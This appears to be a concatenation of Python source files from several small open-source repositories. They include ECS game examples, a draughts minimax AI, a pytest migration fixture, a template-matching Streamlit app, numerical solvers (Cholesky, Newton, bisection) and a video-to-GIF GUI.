world.component_for_entity(player, Velocity).x = -3
if key == pyglet.window.key.UP:
world.component_for_entity(player, Velocity).y = 3
if key == pyglet.window.key.DOWN:
world.component_for_entity(player, Velocity).y = -3
@window.event
def on_key_release(key, mod):
if key in (pyglet.window.key.RIGHT, pyglet.window.key.LEFT):
world.component_for_entity(player, Velocity).x = 0
if key in (pyglet.window.key.UP, pyglet.window.key.DOWN):
world.component_for_entity(player, Velocity).y = 0
@window.event
def on_draw():
# Clear the window:
window.clear()
# Draw the batch of Renderables:
batch.draw()
####################################################
# Schedule a World update and start the pyglet app:
####################################################
if __name__ == "__main__":
# NOTE! schedule_interval will automatically pass a "delta time" argument
# to world.process, so you must make sure that your Processor classes
# account for this. See the example Processors above.
pyglet.clock.schedule_interval(world.process, interval=1.0/FPS)
pyglet.app.run()
```
#### File: esper/examples/pysdl2_example.py
```python
from sdl2 import *
import sdl2.ext as ext
import esper
RESOLUTION = 720, 480
##################################
# Define some Components:
##################################
class Velocity:
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Renderable:
def __init__(self, texture, width, height, posx, posy):
self.texture = texture
self.x = posx
self.y = posy
self.w = width
self.h = height
################################
# Define some Processors:
################################
class MovementProcessor(esper.Processor):
def __init__(self, minx, maxx, miny, maxy):
super().__init__()
self.minx = minx
self.maxx = maxx
self.miny = miny
self.maxy = maxy
def process(self):
# This will iterate over every Entity that has BOTH of these components:
for ent, (vel, rend) in self.world.get_components(Velocity, Renderable):
# Update the Renderable Component's position by it's Velocity:
rend.x += vel.x
rend.y += vel.y
# An example of keeping the sprite inside screen boundaries. Basically,
# adjust the position back inside screen boundaries if it tries to go outside:
rend.x = max(self.minx, rend.x)
rend.y = max(self.miny, rend.y)
rend.x = min(self.maxx - rend.w, rend.x)
rend.y = min(self.maxy - rend.h, rend.y)
class RenderProcessor(esper.Processor):
def __init__(self, renderer, clear_color=(0, 0, 0)):
super().__init__()
self.renderer = renderer
self.clear_color = clear_color
def process(self):
# Clear the window:
self.renderer.clear(self.clear_color)
# Create a destination Rect for the texture:
destination = SDL_Rect(0, 0, 0, 0)
# This will iterate over every Entity that has this Component, and blit it:
for ent, rend in self.world.get_component(Renderable):
destination.x = int(rend.x)
destination.y = int(rend.y)
destination.w = rend.w
destination.h = rend.h
SDL_RenderCopy(self.renderer.renderer, rend.texture, None, destination)
self.renderer.present()
################################
# Some SDL2 Functions:
################################
def texture_from_image(renderer, image_name):
"""Create an SDL2 Texture from an image file"""
soft_surface = ext.load_image(image_name)
texture = SDL_CreateTextureFromSurface(renderer.renderer, soft_surface)
SDL_FreeSurface(soft_surface)
return texture
################################
# The main core of the program:
################################
def run():
# Initialize PySDL2 stuff
ext.init()
window = ext.Window(title="Esper PySDL2 example", size=RESOLUTION)
renderer = ext.Renderer(target=window)
window.show()
# Initialize Esper world, and create a "player" Entity with a few Components.
world = esper.World()
player = world.create_entity()
world.add_component(player, Velocity(x=0, y=0))
world.add_component(player, Renderable(texture=texture_from_image(renderer, "redsquare.png"),
width=64, height=64, posx=100, posy=100))
# Another motionless Entity:
enemy = world.create_entity()
world.add_component(enemy, Renderable(texture=texture_from_image(renderer, "bluesquare.png"),
width=64, height=64, posx=400, posy=250))
# Create some Processor instances, and asign them to be processed.
render_processor = RenderProcessor(renderer=renderer)
movement_processor = MovementProcessor(minx=0, maxx=RESOLUTION[0], miny=0, maxy=RESOLUTION[1])
world.add_processor(render_processor)
world.add_processor(movement_processor)
# A simple main loop
running = True
while running:
start_time = SDL_GetTicks()
for event in ext.get_events():
if event.type == SDL_QUIT:
running = False
break
if event.type == SDL_KEYDOWN:
if event.key.keysym.sym == SDLK_UP:
# Here is a way to directly access a specific Entity's Velocity
# Component's attribute (y) without making a temporary variable.
world.component_for_entity(player, Velocity).y = -3
elif event.key.keysym.sym == SDLK_DOWN:
# For clarity, here is an alternate way in which a temporary variable
# is created and modified. The previous way above is recommended instead.
player_velocity_component = world.component_for_entity(player, Velocity)
player_velocity_component.y = 3
elif event.key.keysym.sym == SDLK_LEFT:
world.component_for_entity(player, Velocity).x = -3
elif event.key.keysym.sym == SDLK_RIGHT:
world.component_for_entity(player, Velocity).x = 3
elif event.key.keysym.sym == SDLK_ESCAPE:
running = False
break
elif event.type == SDL_KEYUP:
if event.key.keysym.sym in (SDLK_UP, SDLK_DOWN):
world.component_for_entity(player, Velocity).y = 0
if event.key.keysym.sym in (SDLK_LEFT, SDLK_RIGHT):
world.component_for_entity(player, Velocity).x = 0
# A single call to world.process() will update all Processors:
world.process()
# A crude FPS limiter for about 60fps
current_time = SDL_GetTicks()
sleep_time = int(start_time + 16.667 - current_time)
if sleep_time > 0:
SDL_Delay(sleep_time)
if __name__ == "__main__":
run()
ext.quit()
``` |
{
"source": "jonathanabila/22E1_5-draughts",
"score": 4
} |
#### File: src/agents/minimax.py
```python
import random
from collections import deque
previous_board = deque(maxlen=5)
def minimax(game, depth, max_player, player):
"""
param board: Current state of the board.
param depth: Maximum depth to explore, less make the game faster, but also less smart.
param max_player: The player to maxime to move.
"""
best_board = game.board
player_function = max if max_player else min
best_score = float("-inf") if max_player else float("inf")
if depth == 0 or game.get_winner():
return game.board.evaluate(), game
for board in game.board.get_valid_boards(player):
should_max_player = False if max_player else True
evaluation, _ = minimax(game, depth - 1, should_max_player, player)
player_eval = player_function(best_score, evaluation)
# The AI is going to play the start of the game in the same way always if we don't add some
# randomization to the evaluation.
if player_eval == evaluation and (
random.randint(0, 9) > 7
or player_eval < best_score
and max_player
or player_eval > best_score
and not max_player
):
# Sometimes, we AI keep doing the same steps to not lose pieces, we need to stop that.
previous_board.append(board)
if previous_board.count(board) > 2:
continue
best_board = board
best_score = evaluation
return best_score, best_board
```
#### File: 22E1_5-draughts/src/managers.py
```python
from constants import BLUE, RED, SQUARE_SIZE, WHITE
from models.board import Board
import pygame
class GameManager:
def __init__(self, window):
self.window = window
self.selected_piece = None
self.board = Board()
self.turn = RED
self.valid_moves = {}
def change_turn(self):
self.valid_moves = {}
if self.turn == RED:
self.turn = WHITE
else:
self.turn = RED
@property
def white_player(self):
return WHITE
@property
def red_player(self):
return RED
def is_ai_turn(self):
return self.turn == WHITE
def _move(self, row, column):
piece = self.board.get_piece(row, column)
if (
self.selected_piece is not None
and piece is None
and (row, column) in self.valid_moves
):
self.board.move(self.selected_piece, row, column)
skipped = self.valid_moves[(row, column)]
if skipped:
self.board.remove(skipped)
self.change_turn()
return True
return False
def select(self, row, column):
if self.selected_piece is not None:
is_moved = self._move(row, column)
if is_moved is True:
self.selected_piece = None
self.select(row, column)
piece = self.board.get_piece(row, column)
if piece is not None and piece.color == self.turn:
self.selected_piece = piece
self.valid_moves = self.board.get_valid_moves(self.selected_piece)
return True
return False
def select_ai_move(self, board):
self.board = board
self.change_turn()
def draw_valid_moves(self, moves):
for move in moves:
row, col = move
pygame.draw.circle(
self.window,
BLUE,
(
col * SQUARE_SIZE + SQUARE_SIZE // 2,
row * SQUARE_SIZE + SQUARE_SIZE // 2,
),
15,
)
def get_winner(self):
return self.board.winner()
def update(self):
self.board.draw(self.window)
self.draw_valid_moves(self.valid_moves)
pygame.display.update()
```
#### File: src/models/board.py
```python
from copy import deepcopy
from typing import List
from constants import BLACK, COLS, PIECES, RED, ROWS, SQUARE_SIZE, WHITE
from models.pieces import Piece
import pygame
class Board:
def __init__(self):
self.board = []
self.create_board()
self.white_left = self.red_left = PIECES
self.white_kings = self.red_kings = 0
def winner(self):
if self.red_left <= 0:
return WHITE
elif self.white_left <= 0:
return RED
return None
def get_piece(self, row, column):
return self.board[row][column]
def move(self, piece: Piece, row, column):
self.board[piece.row][piece.column], self.board[row][column] = (
self.board[row][column],
self.board[piece.row][piece.column],
)
piece.move(row, column)
if row == ROWS - 1 or row == 0:
piece.make_king()
if piece.color == WHITE:
self.white_kings += 1
if piece.color == RED:
self.red_kings += 1
def remove(self, pieces: List[Piece]):
for piece in pieces:
row, column = piece.row, piece.column
self.board[row][column] = None
if piece is not None:
if piece.color == RED:
self.red_left -= 1
else:
self.white_left -= 1
def _traverse_left(self, start, stop, step, color, left, skipped=None):
moves = {}
last = []
for r in range(start, stop, step):
if left < 0:
break
current = self.board[r][left]
if current is None:
if skipped and not last:
break
elif skipped:
moves[(r, left)] = last + skipped
else:
moves[(r, left)] = last
if last:
if step == -1:
row = max(r - 3, 0)
else:
row = min(r + 3, ROWS)
moves.update(
self._traverse_left(
r + step, row, step, color, left - 1, skipped=last
)
)
moves.update(
self._traverse_right(
r + step, row, step, color, left + 1, skipped=last
)
)
break
elif current.color == color:
break
else:
last = [current]
left -= 1
return moves
def _traverse_right(self, start, stop, step, color, right, skipped=None):
moves = {}
last = []
for r in range(start, stop, step):
if right >= COLS:
break
current = self.board[r][right]
if current is None:
if skipped and not last:
break
elif skipped:
moves[(r, right)] = last + skipped
else:
moves[(r, right)] = last
if last:
if step == -1:
row = max(r - 3, 0)
else:
row = min(r + 3, ROWS)
moves.update(
self._traverse_left(
r + step, row, step, color, right - 1, skipped=last
)
)
moves.update(
self._traverse_right(
r + step, row, step, color, right + 1, skipped=last
)
)
break
elif current.color == color:
break
else:
last = [current]
right += 1
return moves
def get_valid_moves(self, piece: Piece):
valid_moves = {}
left, right, row = piece.column - 1, piece.column + 1, piece.row
if piece.color == RED or piece.king:
valid_left_move = self._traverse_left(
row - 1, max(row - 3, -1), -1, piece.color, left
)
valid_right_move = self._traverse_right(
row - 1, max(row - 3, -1), -1, piece.color, right
)
valid_moves.update(valid_left_move)
valid_moves.update(valid_right_move)
if piece.color == WHITE or piece.king:
valid_left_move = self._traverse_left(
row + 1, min(row + 3, ROWS), 1, piece.color, left
)
valid_right_move = self._traverse_right(
row + 1, min(row + 3, ROWS), 1, piece.color, right
)
valid_moves.update(valid_left_move)
valid_moves.update(valid_right_move)
return valid_moves
def get_valid_boards(self, player):
boards = []
for piece in self.get_pieces(player):
for (move_row, move_column), skip in self.get_valid_moves(piece).items():
temporary_board = deepcopy(self)
temporary_piece = temporary_board.get_piece(piece.row, piece.column)
temporary_board.move(temporary_piece, move_row, move_column)
if skip:
temporary_board.remove(skip)
boards.append(temporary_board)
return boards
@staticmethod
def draw_squares(window):
window.fill(BLACK)
for row in range(ROWS):
for col in range(row % 2, COLS, 2):
pygame.draw.rect(
window,
RED,
(row * SQUARE_SIZE, col * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE),
)
def draw(self, window):
self.draw_squares(window)
for row in range(ROWS):
for column in range(COLS):
piece = self.board[row][column]
if piece is not None:
piece.draw(window)
def create_board(self):
for row in range(ROWS):
self.board.append([])
for column in range(COLS):
if column % 2 == (row + 1) % 2:
if row < 3:
piece = Piece(row, column, WHITE)
self.board[row].append(piece)
elif row > 4:
piece = Piece(row, column, RED)
self.board[row].append(piece)
else:
self.board[row].append(None)
else:
self.board[row].append(None)
def get_pieces(self, player):
pieces = []
for row in self.board:
for piece in row:
if piece and piece.color == player:
pieces.append(piece)
return pieces
def evaluate(self):
return (
self.white_left
- self.red_left
+ (self.white_kings * 0.5 - self.red_kings * 0.5)
)
```
#### File: src/models/pieces.py
```python
from constants import CROWN, GREY, SQUARE_SIZE
import pygame.draw
PADDING = 15
OUTLINE = 2
class Piece:
def __init__(self, row, column, color):
self.row = row
self.column = column
self.color = color
self._king = False
self.x = 0
self.y = 0
self._calculate_position()
def __repr__(self):
return f"Piece({self.row}, {self.column}, {self.color})"
@property
def king(self):
return self._king
def _calculate_position(self):
self.x = SQUARE_SIZE * self.column + SQUARE_SIZE // 2
self.y = SQUARE_SIZE * self.row + SQUARE_SIZE // 2
def make_king(self):
self._king = True
def move(self, row, column):
self.row = row
self.column = column
self._calculate_position()
def draw(self, window):
radius = SQUARE_SIZE // 2 - PADDING
pygame.draw.circle(window, GREY, (self.x, self.y), radius + OUTLINE)
pygame.draw.circle(window, self.color, (self.x, self.y), radius)
if self.king is True:
window.blit(
CROWN,
(self.x - CROWN.get_width() // 2, self.y - CROWN.get_height() // 2),
)
``` |
{
"source": "jonathanabila/django-test-migrations",
"score": 3
} |
#### File: django_test_migrations/contrib/pytest_plugin.py
```python
from typing import Optional
import pytest
from django.db import DEFAULT_DB_ALIAS
@pytest.fixture()
def migrator_factory(request, transactional_db, django_db_use_migrations):
"""
Pytest fixture to create migrators inside the pytest tests.
How? Here's an example.
.. code:: python
@pytest.mark.django_db
def test_migration(migrator_factory):
migrator = migrator_factory('custom_db_alias')
old_state = migrator.apply_initial_migration(('main_app', None))
new_state = migrator.apply_tested_migration(
('main_app', '0001_initial'),
)
assert isinstance(old_state, ProjectState)
assert isinstance(new_state, ProjectState)
Why do we import :class:`Migrator` inside the fixture function?
Otherwise, coverage won't work correctly during our internal tests.
Why? Because modules in Python are singletons.
Once imported, they will be stored in memory and reused.
That's why we cannot import ``Migrator`` on a module level.
Because it won't be caught be coverage later on.
"""
from django_test_migrations.migrator import Migrator # noqa: WPS433
if not django_db_use_migrations:
pytest.skip('--nomigrations was specified')
def factory(database_name: Optional[str] = None) -> Migrator:
migrator = Migrator(database_name)
request.addfinalizer(migrator.reset) # noqa: PT021
return migrator
return factory
@pytest.fixture()
def migrator(migrator_factory): # noqa: WPS442
"""
Useful alias for ``'default'`` database in ``django``.
That's a predefined instance of a ``migrator_factory``.
How to use it? Here's an example.
.. code:: python
@pytest.mark.django_db
def test_migration(migrator):
old_state = migrator.apply_initial_migration(('main_app', None))
new_state = migrator.apply_tested_migration(
('main_app', '0001_initial'),
)
assert isinstance(old_state, ProjectState)
assert isinstance(new_state, ProjectState)
Just one step easier than ``migrator_factory`` fixture.
"""
return migrator_factory(DEFAULT_DB_ALIAS)
``` |
{
"source": "jonathanadamrico/FindMe",
"score": 3
} |
#### File: jonathanadamrico/FindMe/main.py
```python
import streamlit as st
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import cv2
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
def main():
st.set_page_config(page_title='FindMe')
st.title("FindMe")
st.write('''
**Hidden Object Finder**
Finds hidden objects in a big crowded picture based on a template object.
Note that the application uses opencv-python's matchTemplate module and currently works best on grayscale images and unrotated objects.
''')
sample_image = Image.open('input/ShakeBreak.png')
st.image(sample_image, caption='Sample Image', use_column_width=True)
st.write("***")
st.write("### Step 1")
image_src = st.file_uploader("Upload the big picture where we need to find the hidden objects", type=['png','jpg','jpeg'])
if image_src is not None:
img_rgb = Image.open(image_src)
st.image(img_rgb, caption='Big Picture', use_column_width=True)
st.write("***")
st.write("### Step 2")
template_src = st.file_uploader("Upload an image that looks similar to the hidden objects", type=['png','jpg','jpeg'])
if template_src is not None:
template = Image.open(template_src)
img_gray = cv2.cvtColor(np.array(img_rgb), cv2.COLOR_BGR2GRAY)
template = cv2.cvtColor(np.array(template), cv2.COLOR_BGR2GRAY)
st.image(template, caption='Hidden Object', use_column_width=False)
height, width = template.shape[::]
st.write("***")
st.write("### Step 3")
threshold = st.slider('Select a value for the threshold', 0.0, 1.0, 0.5)
st.write(f"Finding objects at **{threshold}** similarity threshold...")
result = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
loc = np.where(result >= threshold)
find_count = len(loc[0])
# We want a colored rectangle on top of the gray image
img_gray = cv2.cvtColor(img_gray, cv2.COLOR_GRAY2BGR)
for pt in zip(*loc[::-1]):
top_left = pt
bottom_right = (pt[0] + width, pt[1] + height)
cv2.rectangle(img_gray, top_left, bottom_right, (0, 255, 0), 1)
st.write("***")
st.write("### Result")
if find_count == 0:
st.warning("No objects were found. Try decreasing the threshold to find objects.")
if threshold == 0:
st.warning("Unfortunately, the algorithm is not good enough to find the hidden object(s).")
elif find_count > 100:
st.warning("You may try increasing the threshold to avoid too many false positives.")
else:
st.success("Object(s) found!")
st.image(img_gray, use_column_width=True)
st.write("***")
st.write('''The results may not be very accurate when the hidden objects are of different sizes, colors, backgrounds,
and rotations compared to the template image.
You may visit the [github page](https://github.com/jonathanadamrico/FindMe) for the source codes, documentations, and references.
''')
st.write("### Thank you!")
if __name__ == "__main__":
main()
# Reference:
#https://towardsdatascience.com/object-detection-on-python-using-template-matching-ab4243a0ca62
``` |
{
"source": "Jonathan-Adly/htmx-tictactoe",
"score": 3
} |
#### File: htmx-tictactoe/accounts/models.py
```python
from django.contrib.postgres.fields import ArrayField
from django.contrib.auth.models import AbstractUser
from django.db import models
"""
Our Board should look like this initially = [[0,0,0],[0,0,0],[0,0,0]]
Then as players play, it should look like this = [[1,0,2], [1,2,0], [0,0,0]]
empty = 0
X = 1
O = 2
"""
class CustomUser(AbstractUser):
def get_default():
return [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
player = models.CharField(max_length=1, default="X")
board = ArrayField(ArrayField(models.IntegerField()), default=get_default)
``` |
{
"source": "JonathanAlcantara/NumericalLinearAlgebra_Applications",
"score": 3
} |
#### File: NumericalLinearAlgebra_Applications/Cholesky/cholesky.py
```python
import numpy as np
from math import pow
from math import sqrt
def cholesky(A):
# if not np.all(np.linalg.eigvals(A) > 0):
# print "Matriz nao e Positiva Definida"
# return false
L = [[0.0] * len(A) for i in range(len(A))]
for row in range(len(A)):
sum_row = 0
for k in range(row):
sum_row += pow(L[row][k], 2)
L[row][row] = sqrt(A[row][row] - sum_row)
print('%s, %s: %s' % (row+1, row+1, L[row][row]))
for column in range(row + 1, len(A)):
sum_column = 0
for k in range(row):
sum_column += L[row][k]*L[column][k]
L[column][row] = (A[row][column] - sum_column)/L[row][row]
print('%s, %s: %s' % (row+1, column+1, L[column][row]))
A = np.array(A)
L = np.array(L)
transposed_L = np.transpose(L)
print '\nA : \n', A
print '\nL : \n', L
print '\nL_T :\n', transposed_L
return A, L, transposed_L
def cholesky_solution(L, B):
print 'Cholesky Solution: ', np.matmul(np.linalg.inv(np.matmul(L, np.transpose(L))), np.transpose(B))
def cholesky_det(L):
print 'Cholesky Determinant: ', np.power(np.prod(L.diagonal()), 2)
```
#### File: NumericalLinearAlgebra_Applications/PowerMethod/power_method.py
```python
import numpy as np
tolerance = 0.00001
A = [[1, 0.2, 0], [0.2, 1, 0.5], [0, 0.5, 1]]
def power_method(A):
X = [1]*len(A[0])
new_X = list(X)
eigenvalue_candidate = 1
solution_residue = eigenvalue_candidate
while solution_residue > tolerance:
print '\nLargest Eigenvalue Candidate: ', eigenvalue_candidate
print 'Associated Eigenvector: ', X
X = np.matmul(A, X)
solution_residue = abs(X[0] - eigenvalue_candidate)/abs(X[0])
eigenvalue_candidate = X[0]
for X_element in range(len(X)):
X[X_element] = X[X_element]/float(eigenvalue_candidate)
print '\nLargest Eigenvalue: ', eigenvalue_candidate
print 'Associated Eigenvector: ', X
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/bisection.py
```python
tolerance = 0.00000001
def bisection(a, b, f):
while abs(b - a) > tolerance:
x_current = (a+b)/2.0
func_current_value = f(x_current)
if(func_current_value > 0.0):
b = x_current
else:
a = x_current
return x_current
def f(x):
return x - 1;
print(bisection(-10, 10, f))
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/multi_newton.py
```python
import numpy as np
tolerance = 0.00000001
iterations_limit = 10000
def multi_newton(x0_vector, f_vector, jacobian_vector):
x_vector = x0_vector
for iteration in range(iterations_limit):
jacobian_current_values = jacobian_vector(x_vector)
function_current_values = f_vector(x_vector)
delta_x = -1*(np.linalg.inv(jacobian_current_values)
@ function_current_values)
x_vector = x_vector + delta_x
if(np.linalg.norm(delta_x)/np.linalg.norm(x_vector) \
< tolerance):
return x_vector
return "Convergence not reached"
def f_vector(x_vector):
return np.array([[x_vector[0][0] + 2*x_vector[1][0] - 2.0],
[pow(x_vector[0][0], 2) + 4*pow(x_vector[1][0], 2) - 4]])
def jacobian_vector(x_vector):
return np.array([[1, 2], [2*x_vector[0][0], 8*x_vector[1][0]]])
print(multi_newton(np.array([[2], [3]]), f_vector, jacobian_vector))
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/newton.py
```python
import numpy as np
tolerance = 0.00000001
iterations_limit = 10000
def newton(x0, f, f_derivative):
x_previous = x0
for iteration in range(iterations_limit):
x_current = x_previous - f(x_previous)/f_derivative(x_previous)
if(abs(x_current - x_previous) < tolerance):
return x_current
x_previous = x_current
return x_current
def f(x):
return pow(x, 2) - 4*np.cos(x);
def f_derivative(x):
return 2*x + 4*np.sin(x)
print(newton(10.0, f, f_derivative))
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/secant.py
```python
import numpy as np
tolerance = 0.00000001
iterations_limit = 10000
pace = 0.001
def secant(x0, f):
x_previous = x0
x_current = x_previous + pace
func_previous_value = f(x0)
for iteration in range(iterations_limit):
func_current_value = f(x_current)
x_next = x_current - func_current_value*\
((x_current - x_previous)/\
(func_current_value - func_previous_value))
if(abs(x_next - x_current) < tolerance):
return x_current
x_previous = x_current
x_current = x_next
func_previous_value = func_current_value
return x_current
def f(x):
return pow(x, 2) - 4*np.cos(x);
print(secant(10.0, f))
``` |
{
"source": "JonathanAlis/IAFNNESTA",
"score": 3
} |
#### File: JonathanAlis/IAFNNESTA/demo_wavelet.py
```python
import numpy as np
from scipy import sparse
import sys
import random as rd
import matplotlib.pyplot as plt
from PIL import Image
import waveletDec as wd
import IAFNNESTA
import IAFNNesterov
def help():
return '''
Here we compare the tv reconstruction with the L1 reconstruction in the wavelet domain
IAFNNesterov also allows to use transformations instead of filters, and we show that
it present the same results as L1 wavelet reconstruction
'''
print(help())
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140])
def GetNotNansPos(x):
x=x.reshape((-1,1))
get_not_nan = lambda xs: [i for (y, i) in zip(xs, range(len(xs))) if y==y]
return get_not_nan(x)
def AdjointSampling(x,pos,origShape):
y = np.empty(origShape)
y[:]=np.nan
y=y.reshape((-1,1))
y[pos]=x
y=y.reshape(origShape)
from scipy import interpolate
array = np.ma.masked_invalid(y)
xx, yy = np.meshgrid(np.arange(0, origShape[0]),np.arange(0, origShape[1]))
x1 = xx[~array.mask]
y1 = yy[~array.mask]
newarr = array[~array.mask]
y = interpolate.griddata((x1, y1), newarr.ravel(),
(xx, yy),
method='linear')
return y.reshape((-1,1))
# Parameters
# ----------
import k_space
import radial
brain= np.array(Image.open('data/head256.png').convert('L').resize((256,256)))/255
idx=radial.radial2D(40,brain.shape)
#print(type(idx))
A=lambda x: k_space.k_space_sampling(x,brain.shape,idx)
At=lambda x: k_space.adjoint(x,brain.shape,idx)
b=A(brain)
x0=At(b).reshape(brain.shape).real
pattern=np.random.permutation(brain.size)
U=lambda x: wd.WavDec(x,brain.shape,decLevel=3,family='haar',randperm=pattern)
Ut=lambda x: wd.WavRec(x,brain.shape,decLevel=3,family='haar',randperm=pattern)
xw=np.reshape(U(brain),brain.shape)
import time
t=time.time()
xrtv=IAFNNESTA.IAFNNESTA(b,A=A,At=At,H='tv',sig_size=brain.shape,verbose=0,maxit=1000).real
print(time.time()-t)
t=time.time()
xrwav=IAFNNESTA.IAFNNESTA(b,A=A,At=At,U=U,Ut=Ut,sig_size=brain.shape,verbose=0,maxit=1000).real
print(time.time()-t)
t=time.time()
xrwav_as_h=IAFNNesterov.IAFNNesterov(b,A=A,At=At,H=U,Ht=Ut,verbose=0,maxit=1000)[0].real.reshape(brain.shape)
print(time.time()-t)
plt.title('MRI wavelet demo: tv - L1 wavelet - L1 wavelet as H')
plt.imshow(np.hstack((x0,xrtv,xrwav,xrwav_as_h)),cmap='gray')
plt.savefig('demo_wavelet.png')
plt.show()
```
#### File: JonathanAlis/IAFNNESTA/IAFNNESTA.py
```python
def help():
return '''
Isotropic-Anisotropic Filtering Norm Nesterov Algorithm
Solves the filtering norm minimization + quadratic term problem
Nesterov algorithm, with continuation:
argmin_x || iaFN(x) ||_1/2 subjected to ||b - Ax||_2^2 < delta
If no filter is provided, solves the L1.
Continuation is performed by sequentially applying Nesterov's algorithm
with a decreasing sequence of values of mu0 >= mu >= muf
The observation matrix A must be a projector (non projector not implemented yet)
Inputs:
IAFNNESTA(b, #Observed data, a m x 1 array
A=identity,At=identity, # measurement matrix and adjoint (either a matrix, function handles)
muf=0.0001, #final mu value, smaller leads to higher accuracy
delta, #l2 error bound. This enforces how close the variable
#must fit the observations b, i.e. || y - Ax ||_2 <= delta
#If delta = 0, enforces y = Ax
#delta = sqrt(m + 2*sqrt(2*m))*sigma, where sigma=std(noise).
L1w=1,L2w=0, #weights of L1 (anisotropic) and L2(isotropic) norms
verbose=0, #whether to print internal steps
maxit=1000, #maximum iterations at the inner loop
x0=[], #initial solution, if not provided, will be At(b)
U=identity,Ut=identity, #Analysis/Synthesis operators
stopTest=1, #stopTest == 1 : stop when the relative change in the objective
function is less than TolVar
stopTest == 2 : stop with the l_infinity norm of difference in
the xk variable is less than TolVar
TolVar = 1e-5, #tolerance for the stopping criteria
AAtinv=[], #not implemented
normU=1, #if U is provided, this should be norm(U)
H=[],Ht=[]): #filter operations in sparse matrix form
#also accepts the string 'tv' as input,
#in that case, calculates the tv norm
Outputs:
return xk, #estimated x reconstructed signal
niter, #number of iterations
residuals #first column is the residual at every step,
#second column is the value of f_mu at every step
'''
import IAFNNesterov
import numpy as np
from scipy import sparse
import fil2mat
def identity(x):
return x
def IAFNNESTA(b,sig_size=0,A=identity,At=identity,muf=0.0001,delta=0,L1w=1,L2w=0,verbose=0,MaxIntIter=5,maxit=1000,x0=[],U=identity,Ut=identity,stopTest=1,TolVar = 1e-5,AAtinv=[],normU=1,H=[]):
if delta<0:
raise Exception('Delta must not be negative')
if not callable(A): #If not function
A=lambda x:np.matmul(A,x)
At=lambda x:np.matmul(np.transpose(A),x)
b=b.reshape((-1,1))
Atb=At(b)
if sig_size==0:
sig_size=Atb.shape
if callable(AAtinv):
AtAAtb = At( AAtinv(b) )
else:
if len(AAtinv)>0:
AAtinv=lambda x: np.matmul(AAtinv,x)
AtAAtb = At( AAtinv(b) )
else: #default
AtAAtb = Atb
AAtinv=identity
if len(x0)==0:
x0 = AtAAtb
if len(H)==0:
Hf=identity
Hft=identity
else:
if not sparse.issparse(H):
if isinstance(H, str):
if H=='tv':
hs=[]
hs.append(np.array([[1,-1]]))
hs.append(np.array([[1],[-1]]))
H,_,_,_=fil2mat.fil2mat(hs,sig_size)
else:
print('H not recognized. Must be a sparse matrix, a list of filters or the string tv')
else:
#list of filters:
H,_,_,_=fil2mat.fil2mat(H,sig_size)
#print(H.shape)
#print(H)
#print(type(H))
Ht=H.transpose()
Hf=lambda x: H@x
Hft=lambda x: Ht@x
HU=lambda x: Hf(U(x))
UtHt=lambda x: Ut(Hft(x))
typemin=''
if L1w>0:
typemin+="iso"
if L2w>0:
typemin+="aniso"
typemin+='tropic '
if callable(H):
typemin+='filtering norm '
mu0=0
if L1w>0:
mu0+=L1w*0.9*np.max(np.linalg.norm(HU(x0),1))
if L2w>0:
mu0+=L2w*0.9*np.max(np.linalg.norm(HU(x0),2))
niter = 0
Gamma = np.power(muf/mu0,1/MaxIntIter)
mu = mu0
Gammat= np.power(TolVar/0.1,1/MaxIntIter)
TolVar = 0.1
for i in range(MaxIntIter):
mu = mu*Gamma
TolVar=TolVar*Gammat;
if verbose>0:
#if k%verbose==0:
print("\tBeginning %s Minimization; mu = %g\n" %(typemin,mu))
xk,niter_int,res = IAFNNesterov.IAFNNesterov(b,A=A,At=At,mu=mu,delta=delta,L1w=L1w,L2w=L2w,verbose=verbose,maxit=maxit,x0=x0,U=U,Ut=Ut,stopTest=stopTest,TolVar = TolVar,AAtinv=AAtinv,normU=normU,H=Hf,Ht=Hft)
xplug = xk
niter = niter_int + niter
if i==0:
residuals=res
else:
residuals = np.vstack((residuals, res))
return xk.reshape(sig_size)
if __name__ == "__main__":
print(help())
``` |
{
"source": "JonathanAlis/video2gif",
"score": 3
} |
#### File: JonathanAlis/video2gif/video2gif.py
```python
import PySimpleGUI as sg
import os.path
from moviepy.editor import *
import cv2
import time
# First the window layout in 2 columns
INITIAL_HEIGHT = 240
transforms = [
[
sg.Text("Select a video:"),
sg.In(size=(25, 1), enable_events=True, key="-VIDEO-SELECTED-"),
sg.FilesBrowse(file_types=[("Video Files", "*.mp4")]),
sg.Button("Load/Reload Video")
],
[ sg.Text("Height:"),
sg.Slider(range = (30, 600), resolution=1, tick_interval=50, enable_events = True, orientation= 'horizontal',size=(50,30), key='scale_slider'),
],
[ sg.Text("Start:"),
sg.Slider(range = (0, 10), resolution=1, tick_interval=10, enable_events = True, orientation= 'horizontal',size=(50,30), key='start_slider'),
],
[ sg.Text("Ending:"),
sg.Slider(range = (0, 10), resolution=1, tick_interval=10, enable_events = True, orientation= 'horizontal',size=(50,30), key='end_slider'),
],
# TODO: change speed
# [ sg.Text("Speed:"),
# sg.Slider(range = (0.25, 4), resolution=0.25, tick_interval=10, enable_events = True, orientation= #'horizontal',size=(50,30), key='end_slider'),
# ],
[sg.Text("Cut video:"), sg.Button("Cut inside") , sg.Button("Cut outside")],
[sg.Button("Flip x"), sg.Button("Flip y"), sg.Button("Rotate 90"), sg.Button("Rotate -90")],
# TODO: select a rectangle
# [sg.Text("Select retangle:"), sg.Button("Retangle", disabled=True)],
[sg.Button("Undo",disabled=True), sg.Button("Redo",disabled=True)],
]
# For now will only show the name of the file that was chosen
image_viewer_column = [
[sg.Text(size=(40, 1), key="-TOUT-")],
[sg.Image(key="-IMAGE-")],
[sg.Slider(range = (0, 10), resolution=1, tick_interval=10, enable_events = True, orientation= 'horizontal',size=(50,30), key='trackbar')],
[sg.Button("Play"),
#sg.Button("Pause"),
sg.Button("Stop"),
